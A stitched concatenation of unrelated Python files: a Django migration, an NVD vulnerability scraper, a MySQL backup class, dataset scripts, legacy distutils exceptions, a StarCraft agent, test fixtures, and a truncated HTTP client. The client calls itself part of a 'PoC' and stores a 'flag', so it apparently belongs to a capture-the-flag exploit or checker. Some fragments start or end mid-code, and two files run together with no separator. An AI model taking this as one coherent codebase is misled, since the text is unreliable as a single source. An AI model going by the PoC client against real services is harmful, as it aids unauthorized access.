            midfield = "%*s <= %*s <= %*s" % (fieldlength, "%.7e" % lb[i], fieldlength, "%.7e" % v[i], fieldlength, "%.7e" % ub[i])
        # Violations and non-regular (nan/inf) values override the gauge.
        if (v[i] > (ub[i] + tol) or v[i] < (lb[i] - tol)):
            indicator = " VIOLATED "
        if nonregular:
            indicator = " !REGULAR "
        print("%15s | %*s | %*s" % (identifier, (fieldlength + 6) * 3 , midfield, indicator_length+3, indicator))
    print("-" * 60)
|
# Generated by Django 2.0.4 on 2018-04-12 12:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``text_color`` choice field to the ``details`` model."""

    dependencies = [
        ('text', '0004_details_slug'),
    ]

    operations = [
        migrations.AddField(
            model_name='details',
            name='text_color',
            # BUG FIX: the default must be a *stored* value from
            # `choices` ('black'), not the human-readable label
            # ('Black'), which is not a valid choice value.
            field=models.CharField(choices=[('white', 'White'), ('black', 'Black'), ('e3827b', 'Red')], default='black', max_length=30, verbose_name='text color'),
        ),
    ]
|
from unittest import mock
import pytest
from django.contrib.auth.models import User
from django.db import DEFAULT_DB_ALIAS
from django.test.utils import override_settings
from dj_anonymizer.utils import import_if_exist, truncate_table
@pytest.mark.parametrize('path, expected', [
    ('hello', False),  # no such module file -> loader never invoked
    ('base', True),    # module file exists -> loader invoked
])
def test_import_if_exist(mocker, path, expected):
    """import_if_exist() should only attempt to load modules whose file
    exists under ANONYMIZER_MODEL_DEFINITION_DIR.
    """
    with override_settings(
        ANONYMIZER_MODEL_DEFINITION_DIR='example/anonymizer'
    ):
        # Stub the import machinery so no real module gets loaded.
        mocked_import = mock.MagicMock()
        mocker.patch('importlib.util.spec_from_file_location', mocked_import)
        import_if_exist(path)
        assert mocked_import.called is expected
@mock.patch('dj_anonymizer.utils.connections')
def test_truncate_table(mock_connections):
    """truncate_table() should issue a DELETE for sqlite and raise
    NotImplementedError for unsupported database vendors.
    """
    # The cursor yielded by `connections[alias].cursor()` used as a
    # context manager.
    mock_cursor = mock_connections.\
        __getitem__(DEFAULT_DB_ALIAS).\
        cursor.return_value.__enter__.return_value
    mock_connections.__getitem__(DEFAULT_DB_ALIAS).vendor = 'sqlite'
    truncate_table(User)
    mock_cursor.execute.assert_called_once_with('DELETE FROM "auth_user"')
    # Unknown vendor -> not implemented.
    mock_connections.__getitem__(DEFAULT_DB_ALIAS).vendor = 'dummy'
    with pytest.raises(NotImplementedError):
        truncate_table(User)
|
import autolens as al
def tracer_generator_from_aggregator(aggregator):
    """Map every aggregator entry to its most-likely Tracer."""
    return aggregator.map(func=tracer_from_agg_obj)


def tracer_from_agg_obj(agg_obj):
    """Rebuild the most-likely Tracer from one aggregator entry.

    When hyper-galaxy images were used in the phase, the hyper
    model/galaxy images are re-attached to the matching galaxies before
    the tracer is built.
    """
    output = agg_obj.output
    phase_attributes = agg_obj.phase_attributes
    most_likely_instance = output.most_likely_instance
    galaxies = most_likely_instance.galaxies
    if phase_attributes.hyper_galaxy_image_path_dict is not None:
        for galaxy_path, galaxy in most_likely_instance.path_instance_tuples_for_class(
            al.Galaxy
        ):
            if galaxy_path in phase_attributes.hyper_galaxy_image_path_dict:
                galaxy.hyper_model_image = phase_attributes.hyper_model_image
                galaxy.hyper_galaxy_image = phase_attributes.hyper_galaxy_image_path_dict[
                    galaxy_path
                ]
    return al.Tracer.from_galaxies(galaxies=galaxies)
def masked_imaging_generator_from_aggregator(aggregator):
    """Map every aggregator entry to its MaskedImaging dataset."""
    return aggregator.map(func=masked_imaging_from_agg_obj)


def masked_imaging_from_agg_obj(agg_obj):
    """Rebuild the MaskedImaging a phase was fitted with, restoring the
    meta-dataset settings stored alongside the aggregator entry.
    """
    return al.MaskedImaging(
        imaging=agg_obj.dataset,
        mask=agg_obj.mask,
        psf_shape_2d=agg_obj.meta_dataset.psf_shape_2d,
        pixel_scale_interpolation_grid=agg_obj.meta_dataset.pixel_scale_interpolation_grid,
        inversion_pixel_limit=agg_obj.meta_dataset.inversion_pixel_limit,
        inversion_uses_border=agg_obj.meta_dataset.inversion_uses_border,
        positions_threshold=agg_obj.meta_dataset.positions_threshold,
    )
def fit_imaging_generator_from_aggregator(aggregator):
    """Map every aggregator entry to its FitImaging result."""
    return aggregator.map(func=fit_imaging_from_agg_obj)


def fit_imaging_from_agg_obj(agg_obj):
    """Re-run the fit for one aggregator entry by combining its rebuilt
    MaskedImaging and Tracer.
    """
    masked_imaging = masked_imaging_from_agg_obj(agg_obj=agg_obj)
    tracer = tracer_from_agg_obj(agg_obj=agg_obj)
    return al.FitImaging(masked_imaging=masked_imaging, tracer=tracer)
|
# Author: 14281055 Liheng Chen CIT BJTU
# File Name: NVDVulnInfoCrawler.py
import re
import os
import bs4
import xlrd
import xlwt
from xlutils.copy import copy
import Repository
def write_workbook(vuln_detail_dict, save_path, row):
    """Append one vulnerability record to the spreadsheet at *save_path*.

    The column layout mirrors the header written by init_workbook():
    four basic fields, four CVSS v3 columns, four CVSS v2 columns, then
    up to 25 (hyperlink, resource) reference pairs.  References whose
    resource looks like a patch are written in a highlight colour.

    Fixed: string comparisons previously used ``is`` / ``is not``,
    which only works by accident of CPython string interning.
    """
    r_workbook = xlrd.open_workbook(save_path, formatting_info=True)
    w_workbook = copy(r_workbook)
    w_sheet = w_workbook.get_sheet(0)
    keys = ['CVE Number', 'Current Description', 'Analysis Description', 'Vulnerability Type']
    cvss_v3_keys = ['CVSS v3 Base Score', 'Vector', 'Impact Score', 'Exploitability Score']
    cvss_v2_keys = ['CVSS v2 Base Score', 'Vector', 'Impact Subscore', 'Exploitability Subscore']
    reference_keys = ['Hyperlink', 'Resource']
    start_col = 0
    for key in keys:
        if key in vuln_detail_dict:
            w_sheet.write(row, start_col, vuln_detail_dict[key])
        start_col += 1
    # NOTE(review): start_col only advances past the CVSS sections when the
    # corresponding key is present.  get_vuln_detail_dict() always sets both
    # keys (possibly to empty dicts), so columns stay aligned in practice.
    if 'CVSS Severity V3' in vuln_detail_dict:
        cvss_v3_dict = vuln_detail_dict['CVSS Severity V3']
        for key in cvss_v3_keys:
            if key in cvss_v3_dict:
                w_sheet.write(row, start_col, cvss_v3_dict[key])
            # NVD sometimes labels v3 scores with the v2 "Subscore" names.
            elif key == 'Impact Score' and 'Impact Subscore' in cvss_v3_dict:
                w_sheet.write(row, start_col, cvss_v3_dict['Impact Subscore'])
            elif key == 'Exploitability Score' and 'Exploitability Subscore' in cvss_v3_dict:
                w_sheet.write(row, start_col, cvss_v3_dict['Exploitability Subscore'])
            start_col += 1
    if 'CVSS Severity V2' in vuln_detail_dict:
        cvss_v2_dict = vuln_detail_dict['CVSS Severity V2']
        for key in cvss_v2_keys:
            if key in cvss_v2_dict:
                w_sheet.write(row, start_col, cvss_v2_dict[key])
            # Mirror image of the v3 fallback above.
            elif key == 'Impact Subscore' and 'Impact Score' in cvss_v2_dict:
                w_sheet.write(row, start_col, cvss_v2_dict['Impact Score'])
            elif key == 'Exploitability Subscore' and 'Exploitability Score' in cvss_v2_dict:
                w_sheet.write(row, start_col, cvss_v2_dict['Exploitability Score'])
            start_col += 1
    if 'References' in vuln_detail_dict:
        reference_list = vuln_detail_dict['References']
        count = 1
        for reference in reference_list:
            # Highlight references that point at a patch.
            if 'Resource' in reference and re.match('.*patch', reference['Resource'], re.I):
                color_index = 2
            else:
                color_index = 0
            for key in reference_keys:
                if key in reference:
                    w_sheet.write(row, start_col, reference[key],
                                  Repository.set_font(color_index=color_index))
                start_col += 1
            # The sheet header only provides room for 25 references.
            if count == 25:
                break
            count += 1
    w_workbook.save(save_path)
def init_workbook(path):
    """Create a fresh .xls workbook at *path* with the two-row NVD header.

    Overwrites any existing file.  Column order must match the writing
    order in write_workbook(): basic fields, CVSS v3, CVSS v2, then 25
    (hyperlink, resource) reference pairs.
    """
    # Remove a stale file so xlwt starts from a clean workbook.
    if os.path.exists(path):
        os.remove(path)
    # Open workbook
    w_workbook = xlwt.Workbook()
    w_sheet = w_workbook.add_sheet('NVD Vuln Detail', cell_overwrite_ok=True)
    # Table head
    heads = ['CVE Number', 'Current Description', 'Analysis Description', 'Vulnerability Type']
    cvss_head = ['Base Score', 'Vector', 'Impact Score', 'Exploitability Score']
    reference_head = ['Hyperlink', 'Resource']
    # Write Head
    start_col = 0
    # Default column width; wider columns below are scaled from it.
    cell_width = w_sheet.col(0).width
    # Write heads
    for col in range(start_col, start_col + len(heads)):
        w_sheet.write_merge(0, 1, col, col, heads[col - start_col], Repository.set_font(bold=True))
        w_sheet.col(col).width = int(cell_width * 1.75)
    start_col += len(heads)
    # Write CVSS V3 head: one merged title cell over the four sub-columns.
    w_sheet.write_merge(
        0, 0,
        start_col, start_col + len(cvss_head) - 1,
        'CVSS Severity V3', Repository.set_font(bold=True)
    )
    for col in range(start_col, start_col + len(cvss_head)):
        w_sheet.write(1, col, cvss_head[col - start_col], Repository.set_font(bold=True))
        w_sheet.col(col).width = int(cell_width * 1.25)
    start_col += len(cvss_head)
    # Write CVSS V2 head (same shape as the V3 section).
    w_sheet.write_merge(
        0, 0,
        start_col, start_col + len(cvss_head) - 1,
        'CVSS Severity V2', Repository.set_font(bold=True)
    )
    for col in range(start_col, start_col + len(cvss_head)):
        w_sheet.write(1, col, cvss_head[col - start_col], Repository.set_font(bold=True))
        w_sheet.col(col).width = int(cell_width * 1.25)
    start_col += len(cvss_head)
    # Write reference head: 25 numbered (Hyperlink, Resource) pairs.
    for index in range(0, 25):
        reference_title = 'Reference ' + str(index + 1)
        w_sheet.write_merge(
            0, 0,
            start_col, start_col + len(reference_head) - 1,
            reference_title, Repository.set_font(bold=True)
        )
        for col in range(start_col, start_col + len(reference_head)):
            w_sheet.write(1, col, reference_head[col - start_col], Repository.set_font(bold=True))
            w_sheet.col(col).width = int(cell_width * 2)
        start_col += len(reference_head)
    # Save
    w_workbook.save(path)
def get_dl_dict(base_soup, attrs=None):
    """Parse the first <dl> matching *attrs* into a {dt-text: dd-text} dict.

    Keys are the <dt> texts with colons stripped; a key without a matching
    <dd> maps to the empty string.  Returns {} when no <dl> is found.
    """
    if attrs is None:
        attrs = {}
    dl_dict = {}
    tag_dl = base_soup.find('dl', attrs=attrs)
    if tag_dl:
        keys = [dt.get_text().strip().replace(':', '')
                for dt in tag_dl.find_all('dt')]
        values = [dd.get_text().strip() for dd in tag_dl.find_all('dd')]
        for index, key in enumerate(keys):
            dl_dict[key] = values[index] if index < len(values) else ''
    return dl_dict
def update_dict_with_soup(dictionary, key, soup):
    """Store *soup*'s stripped text in *dictionary* under *key*.

    Falsy *soup* stores the empty string; an empty *key* is ignored.
    Fixed: the original compared strings with ``is not``, which only
    works by accident of CPython string interning.
    """
    if key != '':
        if soup:
            dictionary.update({key: soup.get_text().strip()})
        else:
            dictionary.update({key: ''})
# Capture vuln detail
def get_vuln_detail_dict(vuln_detail_url):
    """Scrape one NVD vulnerability detail page into a dictionary.

    Returns an empty dict when the page cannot be fetched.  References
    are reordered so patch references come first.

    Fixed: the original removed items from ``reference_list`` while
    iterating over it, which silently skips the element following every
    patch reference.
    """
    vuln_detail_dict = {}
    # Connect
    content = Repository.requests_get_content(vuln_detail_url, try_times=5, timeout=5)
    if not content:
        return vuln_detail_dict
    url_soup = bs4.BeautifulSoup(content, "html.parser")
    # Add current description
    update_dict_with_soup(vuln_detail_dict, 'Current Description',
                          url_soup.find('p', attrs={'data-testid': 'vuln-description'}))
    # Add analysis description
    update_dict_with_soup(vuln_detail_dict, 'Analysis Description',
                          url_soup.find('p', attrs={'data-testid': 'vuln-analysis-description'}))
    # Add impact
    vuln_detail_dict.update(
        {"CVSS Severity V3": get_dl_dict(url_soup, {'data-testid': 'vuln-cvssv3-score-container'})})
    vuln_detail_dict.update(
        {"CVSS Severity V2": get_dl_dict(url_soup, {'data-testid': 'vuln-cvssv2-score-container'})})
    # Add references, with patch references moved to the front.
    reference_list = Repository.get_reference_dict_list(url_soup)

    def _is_patch(reference):
        # Missing 'Resource' keys count as non-patch instead of raising.
        return bool(re.match('.*patch', reference.get('Resource', ''), re.I))

    patch_list = [ref for ref in reference_list if _is_patch(ref)]
    other_list = [ref for ref in reference_list if not _is_patch(ref)]
    vuln_detail_dict.update({'References': patch_list + other_list})
    # Add vuln type
    tag_div = url_soup.find('div', attrs={'class': 'technicalDetails'})
    if tag_div:
        tag_li = tag_div.find('li')
        if tag_li:
            vuln_detail_dict.update({'Vulnerability Type': tag_li.get_text().strip()})
    return vuln_detail_dict
# Write vuln detail in excel
def write_oss_vuln_detail(oss_info_dict):
    """Search NVD for one software's CVEs and write them all to an .xls file.

    Expects 'Key Word' and 'Sequence Number' entries in *oss_info_dict*;
    returns early when 'Key Word' is absent or no NVD records exist.
    NOTE(review): the output directory is a hard-coded Windows path —
    consider making it configurable.
    """
    # Get NVD records count
    if 'Key Word' not in oss_info_dict.keys():
        return
    # NVD search queries use '+' in place of spaces.
    key_word = oss_info_dict['Key Word'].strip().replace(" ", "+")
    oss_info_dict.update({'NVD Records Count': Repository.get_cve_count(key_word)})
    print("NVD Records Count:" + str(oss_info_dict['NVD Records Count']))
    if oss_info_dict['NVD Records Count'] <= 0:
        return
    # init workbook
    save_path = \
        'C:/Users/79196/Downloads/NVD/Simpler Result/' + oss_info_dict['Sequence Number'] \
        + '-' + oss_info_dict['Key Word'] + '.xls'
    init_workbook(save_path)
    # Data rows start below the two header rows.
    row = 2
    # Make Search Result URL; NVD paginates results 20 at a time.
    for start_index in range(0, oss_info_dict['NVD Records Count'], 20):
        search_result_url = "https://nvd.nist.gov/vuln/search/results" \
                            "?adv_search=false&form_type=basic" \
                            "&results_type=overview&search_type=all" \
                            "&query=" + key_word + "&startIndex=" + str(start_index)
        print("Connect:" + search_result_url)
        # Capture vuln ID in one page
        cve_id_list = Repository.get_cve_id_list(search_result_url)
        if not cve_id_list:
            print("No CVE Entry:" + search_result_url)
        # Write vuln detail
        for cve_id in cve_id_list:
            cve_detail_url = "https://nvd.nist.gov/vuln/detail/" + cve_id
            print("Connect:" + cve_detail_url, end='\t\t')
            # Get vuln detail
            vuln_detail_dict = get_vuln_detail_dict(cve_detail_url)
            vuln_detail_dict.update({'CVE Number': cve_id})
            vuln_detail_dict.update({'Detail Link': cve_detail_url})
            write_workbook(vuln_detail_dict, save_path, row)
            # Progress indicator: rows written vs. total records.
            print('Rate:' + str(int((row - 1) / oss_info_dict['NVD Records Count'] * 100)) + '%')
            row += 1
# Entrance
def main():
    """Read the OSS list workbook and crawl NVD details for every entry.

    NOTE(review): input and output locations are hard-coded Windows paths.
    """
    save_dir = 'C:/Users/79196/Downloads/NVD/Result'
    if not os.path.exists(save_dir):
        os.makedirs(save_dir)
    # Get software name
    print("Getting software name...")
    software_name_list_path = "C:/Users/79196/Downloads/NVD/OSSList(V2).xls"
    r_workbook = xlrd.open_workbook(software_name_list_path)
    for r_sheet in r_workbook.sheets():
        # Row 0 is the header; data rows start at 1.
        if r_sheet.nrows > 1:
            for row in range(1, r_sheet.nrows):
                oss_info_dict = {
                    'Sequence Number': str(r_sheet.cell(row, 0).value.strip()),
                    'Name': str(r_sheet.cell(row, 1).value.strip()),
                    'Key Word': str(r_sheet.cell(row, 2).value.strip()),
                    'Describe': str(r_sheet.cell(row, 3).value.strip())
                }
                print("Sequence Number:" + oss_info_dict['Sequence Number']
                      + "\nSoftware:" + oss_info_dict['Name'])
                # Write vuln detail
                write_oss_vuln_detail(oss_info_dict)
if __name__ == "__main__":
    main()
|
"""Class to describe MySQL backup copy"""
import json
from .periodic_copy import PeriodicCopy
from .exceptions import WrongInputData
class MySQLCopy(PeriodicCopy):  # pylint: disable=too-many-instance-attributes
    """
    Instantiate a MySQL copy.

    :param host: Hostname where the backup was taken from.
    :type host: str
    :param run_type: Run type when the backup was taken: daily, weekly, etc.
    :type run_type: str
    :param name: Base name of the backup copy file as it's stored
        on the destination.
    :type name: str
    :raise WrongInputData: if type is neither full or incremental,
        if name is not a basename, or if both ``config`` and
        ``config_files`` are given.
    """

    # Attributes compared by __eq__() and exported by as_dict()/serialize().
    __attr = [
        "host",
        "run_type",
        "name",
        "binlog",
        "position",
        "lsn",
        "parent",
        "galera",
        "wsrep_provider_version",
        "config",
        "backup_started",
        "backup_finished",
        "type",
    ]

    def __init__(self, *args, **kwargs):
        super(MySQLCopy, self).__init__(*args, **kwargs)
        self._source_type = "mysql"
        # "type" must be either "full" or "incremental"; anything else is None.
        if "type" in kwargs and kwargs.get("type") in ["full", "incremental"]:
            self._type = kwargs.get("type")
        else:
            self._type = None
        if "/" in self.name:
            raise WrongInputData(
                "name must be relative, without any slashes."
                " Got %s instead." % self.name
            )
        # Zero/missing timestamps are normalized to None ("unknown").
        self._backup_started = int(kwargs.get("backup_started", 0)) or None
        self._backup_finished = int(kwargs.get("backup_finished", 0)) or None
        self._binlog = kwargs.get("binlog", None)
        self._position = kwargs.get("position", None)
        self._lsn = kwargs.get("lsn", None)
        self._parent = kwargs.get("parent", None)
        # Presence of wsrep_provider_version implies a Galera backup.
        if "wsrep_provider_version" in kwargs:
            self._wsrep_provider_version = kwargs.get("wsrep_provider_version")
            self._galera = self._wsrep_provider_version is not None
        else:
            self._galera = False
            self._wsrep_provider_version = None
        if "config" in kwargs and "config_files" in kwargs:
            raise WrongInputData(
                "Either config or config_files can be used "
                "to initialize config attribute"
            )
        if "config_files" in kwargs:
            # Read each listed file and keep its content keyed by path.
            self._config = {}
            config_files = kwargs.get("config_files", [])
            for config_file in config_files:
                with open(config_file, "r") as config_descr:
                    self._config[config_file] = config_descr.read()
        else:
            self._config = kwargs.get("config", {})

    def __eq__(self, other):
        # Attribute-by-attribute comparison.  Fixed: comparing against an
        # object lacking one of the attributes used to raise AttributeError;
        # now we return NotImplemented so Python can try the other operand.
        try:
            return all(
                getattr(self, attr) == getattr(other, attr)
                for attr in self.__attr
            )
        except AttributeError:
            return NotImplemented

    def __ne__(self, other):
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def __str__(self):
        # There is a bug https://bugs.python.org/issue16333
        # dumps() leaves trailing whitespaces
        return "%s(%s) = %s" % (
            self.__class__.__name__,
            self.key,
            json.dumps(self.as_dict(), sort_keys=True, indent=4).replace(
                " \n", "\n"
            ),
        )

    @property
    def created_at(self):
        """Timestamp when the backup job started."""
        return self._backup_started

    @property
    def backup_started(self):
        """Timestamp when the backup job started."""
        return self._backup_started

    @property
    def backup_finished(self):
        """Timestamp when the backup job finished."""
        return self._backup_finished

    @property
    def duration(self):
        """Time in seconds it took to take the backup.

        NOTE(review): raises TypeError when either timestamp is unknown
        (None) — preserved behavior.
        """
        return self._backup_finished - self._backup_started

    @property
    def binlog(self):
        """File name of the binlog."""
        return self._binlog

    @property
    def position(self):
        """Binlog position of the backup copy."""
        return self._position

    @property
    def type(self):
        """Full or incremental."""
        return self._type

    @property
    def parent(self):
        """For incremental backup it is a base full copy name."""
        return self._parent

    @property
    def lsn(self):
        """LSN of the backup."""
        return self._lsn

    @property
    def config(self):
        """Dictionary of configs and their content."""
        return self._config

    @property
    def galera(self):
        """True if the backup was taken from Galera."""
        return self._galera

    @property
    def wsrep_provider_version(self):
        """If it was Galera, value of wsrep_provider_version"""
        return self._wsrep_provider_version

    @property
    def sort_key(self):
        """Key used to order copies chronologically; 0 when unknown."""
        return self.created_at or 0

    def as_dict(self):
        """Return representation of the class instance for output purposes."""
        return {attr: getattr(self, attr) for attr in self.__attr}

    def serialize(self):
        """Prepare the status for storing as a string."""
        return json.dumps(self.as_dict())
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Speciallan
import os
anno_path = '../../data/VOCdevkit/SAR-Ship-Dataset/dataset_voc'
main_path = '../../data/VOCdevkit/SAR-Ship-Dataset/ImageSets/Main'

# Fixed: the output directory may not exist yet; create it before writing.
os.makedirs(main_path, exist_ok=True)

train_list = os.listdir(anno_path + '/train/Annotations')
test_list = os.listdir(anno_path + '/test/Annotations')
print(len(train_list), len(test_list))


def _write_split(list_path, names):
    """Write one image id per line, derived from each annotation's .xml name."""
    with open(list_path, 'w') as f:
        for name in names:
            if '.xml' in name:
                f.write(name.replace('.xml', '') + '\n')


# Fixed: the two identical write loops are now a shared helper.
_write_split(main_path + '/trainval.txt', train_list)
_write_split(main_path + '/test.txt', test_list)
|
#!/usr/bin/env python
# encoding: utf-8
def most_common(lst):
    """Return the most frequent element of *lst*.

    Fixed: the original called ``lst.count`` once per distinct element
    (O(n*k)); Counter does a single O(n) pass.  Ties are now broken
    deterministically by first occurrence (the set-based version broke
    ties in arbitrary set order).  Raises on an empty list, as before.
    """
    from collections import Counter
    return Counter(lst).most_common(1)[0][0]
def POSEnsemble(lst):
    """Majority-vote each position across the tag sequences in *lst*."""
    sequence_length = len(lst[0])
    return [
        most_common([sequence[position] for sequence in lst])
        for position in range(sequence_length)
    ]
|
"""distutils.errors
Provides exceptions used by the Distutils modules. Note that Distutils
modules may raise standard exceptions; in particular, SystemExit is
usually raised for errors that are obviously the end-user's fault
(eg. bad command-line arguments).
This module safe to use in "from ... import *" mode; it only exports
symbols whose names start with "Distutils" and end with "Error"."""
# created 1999/03/03, Greg Ward
__rcsid__ = "$Id$"
from types import *
# NOTE(review): legacy Python-1.5-era compatibility switch — class-based
# exceptions when the interpreter supports them, plain strings otherwise.
# ClassType comes from the star-import of ``types`` above; on modern
# Pythons this name no longer exists — TODO confirm intended interpreters.
if type (RuntimeError) is ClassType:

    # DistutilsError is the root of all Distutils evil.
    class DistutilsError (Exception):
        pass

    # DistutilsModuleError is raised if we are unable to load an expected
    # module, or find an expected class within some module
    class DistutilsModuleError (DistutilsError):
        pass

    # DistutilsClassError is raised if we encounter a distribution or command
    # class that's not holding up its end of the bargain.
    class DistutilsClassError (DistutilsError):
        pass

    # DistutilsGetoptError (help me -- I have JavaProgrammersDisease!) is
    # raised if the option table provided to fancy_getopt is bogus.
    class DistutilsGetoptError (DistutilsError):
        pass

    # DistutilsArgError is raised by fancy_getopt in response to getopt.error;
    # distutils.core then turns around and raises SystemExit from that. (Thus
    # client code should never see DistutilsArgError.)
    class DistutilsArgError (DistutilsError):
        pass

    # DistutilsFileError is raised for any problems in the filesystem:
    # expected file not found, etc.
    class DistutilsFileError (DistutilsError):
        pass

    # DistutilsOptionError is raised anytime an attempt is made to access
    # (get or set) an option that does not exist for a particular command
    # (or for the distribution itself).
    class DistutilsOptionError (DistutilsError):
        pass

# String-based exceptions
else:
    DistutilsError = 'DistutilsError'
    DistutilsModuleError = 'DistutilsModuleError'
    DistutilsClassError = 'DistutilsClassError'
    DistutilsGetoptError = 'DistutilsGetoptError'
    DistutilsArgError = 'DistutilsArgError'
    DistutilsFileError = 'DistutilsFileError'
    DistutilsOptionError = 'DistutilsOptionError'
|
# -*- coding:ascii -*-
# NOTE(review): mako auto-generated template module metadata — do not edit
# by hand; regenerate from the .cssm template instead.
from mako import runtime, filters, cache
UNDEFINED = runtime.UNDEFINED
__M_dict_builtin = dict
__M_locals_builtin = locals
_magic_number = 9
_modified_time = 1389308004.184105
_enable_loop = True
_template_filename = 'C:\\myStuff\\calculator\\styles/calc.cssm'
_template_uri = 'calc.cssm'
_source_encoding = 'ascii'
import os, os.path, re
_exports = []
def render_body(context,**pageargs):
    """Render the template body into *context*'s writer (mako-generated)."""
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        # SOURCE LINE 1
        __M_writer('/* Nothing here yet */')
        return ''
    finally:
        # Always pop the frame, even if rendering raised.
        context.caller_stack._pop_frame()
|
from setuptools import setup, find_packages
# Fixed: read metadata files with an explicit encoding instead of the
# platform default, which breaks on Windows for the umlauts below.
with open("README.md", encoding="utf-8") as f:
    readme = f.read()

with open("LICENSE", encoding="utf-8") as f:
    license = f.read()

setup(
    name="gadi",
    version="0.1.0",
    description="Zugänglichere Versionen der Daten von gesetze-im-internet.de",
    long_description=readme,
    author="Niko Felger",
    author_email="niko.felger@gmail.com",
    url="https://github.com/nfelger/gesetze-aus-dem-internet",
    license=license,
    packages=find_packages(exclude=("tests", "docs", "example_json")),
)
|
from pysc2.env import sc2_env
from pysc2.lib import features
from pysc2.agents import base_agent
from pysc2.lib import actions
from absl import app
import numpy as np
import torch
# Map and environment configuration.
MAPNAME = 'MoveToBeacon'
# Actions per minute; 0 means step as fast as possible.
APM = 0
APM = int(APM / 18.75)
# 0 = no per-episode game-step limit.
UNLIMIT = 0
VISUALIZE = False
REALTIME = True
if REALTIME :
    REALTIME_GAME_LOOP_SECONDS = 1
else:
    # SC2 runs 22.4 game loops per second when not in realtime mode.
    REALTIME_GAME_LOOP_SECONDS = 22.4
SCREEN_SIZE = 32
MINIMAP_SIZE = 16
CONTROL_GROUP_SET = 1
MARINE_GROUP_ORDER = 1
# Raw id of the Move_screen ability.
MOVE_SCREEN = 331
NOT_QUEUED = [0]
# PPO-style hyperparameters (currently unused by the no-op Agent below).
LEARNING_RATE = 0.001
GAMMA = 0.98
LMBDA = 0.95
EPS_CLIP = 0.1
K_EPOCH = 10
T_HORIZON = 1000
EPISODES = 10000
players = [sc2_env.Agent(sc2_env.Race.terran),]
interface = features.AgentInterfaceFormat(\
    feature_dimensions = features.Dimensions(\
    screen = SCREEN_SIZE, minimap = MINIMAP_SIZE), use_feature_units = True)
class Agent(base_agent.BaseAgent):
    """Minimal scripted agent that always issues a no-op action."""

    def step(self, obs):
        # Let the base class update its bookkeeping, then do nothing.
        super(Agent, self).step(obs)
        return actions.FUNCTIONS.no_op()
def main(args):
    """Run the no-op agent on MoveToBeacon until EPISODES or Ctrl-C."""
    agent = Agent()
    try:
        episode = 0
        with sc2_env.SC2Env(map_name = MAPNAME, players = players,\
            agent_interface_format = interface,\
            step_mul = APM, game_steps_per_episode = UNLIMIT,\
            visualize = VISUALIZE, realtime = REALTIME) as env:
            while True:
                if episode > EPISODES:
                    break
                episode += 1
                agent.setup(env.observation_spec(), env.action_spec())
                timestep = env.reset()
                agent.reset()
                done = False
                while not done :
                    # Step at most T_HORIZON times per rollout segment.
                    for t in range(T_HORIZON):
                        step_actions = [agent.step(timestep[0])]
                        timestep = env.step(step_actions)
                        reward = timestep[0].reward
                        # last() marks the final timestep of an episode.
                        if timestep[0].last():
                            done = True
                            break
    except KeyboardInterrupt:
        # Allow clean manual shutdown.
        pass
app.run(main)
import sqlite3
import pytest
from ddht.v5_1.alexandria.advertisement_db import create_tables
@pytest.fixture
async def alice_alexandria_client(alice, alice_network):
    # Yield an Alexandria client bound to alice's network; the async
    # context manager handles setup/teardown around each test.
    async with alice.alexandria.client(alice_network) as alice_alexandria_client:
        yield alice_alexandria_client
@pytest.fixture
async def bob_alexandria_client(bob, bob_network):
    # Same as alice_alexandria_client, but for bob.
    async with bob.alexandria.client(bob_network) as bob_alexandria_client:
        yield bob_alexandria_client
@pytest.fixture
async def alice_alexandria_network(alice, alice_network):
    # Full Alexandria network service (client plus handlers) for alice.
    async with alice.alexandria.network(alice_network) as alice_alexandria:
        yield alice_alexandria
@pytest.fixture
async def bob_alexandria_network(bob, bob_network):
    # Same as alice_alexandria_network, but for bob.
    async with bob.alexandria.network(bob_network) as bob_alexandria:
        yield bob_alexandria
@pytest.fixture
def base_conn():
    """Fresh in-memory SQLite connection, without any schema applied."""
    connection = sqlite3.connect(":memory:")
    return connection
@pytest.fixture
def conn(base_conn):
    # The in-memory connection with the advertisement schema applied.
    create_tables(base_conn)
    return base_conn
|
import json
import uuid
from time import sleep
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
class Api:
    """Thin HTTP client for the target service, used by the PoC below.

    Session cookies captured at registration are replayed on every
    subsequent call.
    """
    def __init__(self, hostname):
        # Per-request timeout in seconds.
        self.timeout = 4
        self.hostname = hostname
        self.cookies = {}
    # user
    def register(self, name, password):
        """Create an account and capture the session cookies."""
        request = {
            "name": name,
            "password": password
        }
        result = self.retryable_requests().post(
            f"http://{self.hostname}/Account/register",
            json=request, timeout=self.timeout
        )
        self.cookies = result.cookies.get_dict()
    def add_claimed_weapon(self, name, is_vorpal, force, flag):
        """PUT a claimed weapon; the response body is ignored."""
        request = {
            "name": name,
            "isVorpal": is_vorpal,
            "force": force,
            "arcaneProperty": flag
        }
        result = self.retryable_requests().put(
            f"http://{self.hostname}/Weapon/claimed",
            json=request, timeout=self.timeout, cookies=self.cookies
        )
    def get_weapon(self, weapon_name):
        """Fetch a single weapon record as parsed JSON."""
        request = {
            "weaponName": weapon_name
        }
        result = self.retryable_requests().post(
            f"http://{self.hostname}/Weapon/weapon",
            json=request, timeout=self.timeout, cookies=self.cookies
        )
        return result.json()
    def get_weapon_list(self):
        """Fetch the caller's weapon list as parsed JSON."""
        result = self.retryable_requests().get(
            f"http://{self.hostname}/Weapon/weaponList",
            timeout=self.timeout, cookies=self.cookies
        )
        return result.json()
    def test_weapon(self, breeding_seed, weapon_name):
        """Trigger a weapon test run; returns the raw response.

        NOTE(review): deliberately uses a plain (non-retrying) request
        with verify=False — presumably to observe the raw error behavior.
        """
        request = {
            "breedingSeed": breeding_seed,
            "weaponName": weapon_name
        }
        result = requests.put(
            f"http://{self.hostname}/Jabberwocky/weaponTestResult",
            json=request, timeout=self.timeout, cookies=self.cookies, verify=False
        )
        return result
    def get_juberwocky_list(self):
        """Fetch the jabberwocky list as parsed JSON."""
        result = self.retryable_requests().get(
            f"http://{self.hostname}/Jabberwocky/jabberwockyList",
            timeout=self.timeout, cookies=self.cookies
        )
        return result.json()
    def retryable_requests(self,
                           retries=3,
                           backoff_factor=0.3,
                           status_forcelist=(400, 409, 500, 502, 504),
                           session=None,
                           ):
        """Return a requests.Session that retries the listed status codes."""
        session = session or requests.Session()
        retry = Retry(
            total=retries,
            read=retries,
            connect=retries,
